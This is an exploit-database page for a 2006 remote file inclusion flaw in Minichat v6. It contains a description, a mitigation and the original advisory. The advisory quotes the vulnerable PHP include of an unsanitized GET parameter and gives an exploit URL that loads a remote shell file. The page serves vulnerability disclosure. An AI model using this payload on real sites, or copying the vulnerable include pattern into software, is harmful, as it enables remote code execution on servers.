header-logo
Suggest Exploit
vendor:
Minichat
by:
Zickox
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Minichat
Affected Version From: v6
Affected Version To: v6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Minichat v6 Remote File Include

A vulnerability exists in Minichat v6, which allows a remote attacker to include a file from a remote location. The vulnerable code is located in the ftag.php file, which contains a parameter called 'mostrar' that is not properly sanitized before being used in an include statement. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable file, which will include the malicious file from the remote location.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct paths that are used to include files.
Source

Exploit-DB raw data:

###############################################################################################################

     Minichat v6 Remote File Include
###############################################################################################################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com

###############################################################################################################
Download Software:

http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip

###############################################################################################################
Affected File:

ftag.php

###############################################################################################################

Code vulnerable:

<? include($_GET['mostrar']); ?>


###############################################################################################################


Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

###############################################################################################################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team

# milw0rm.com [2006-10-11]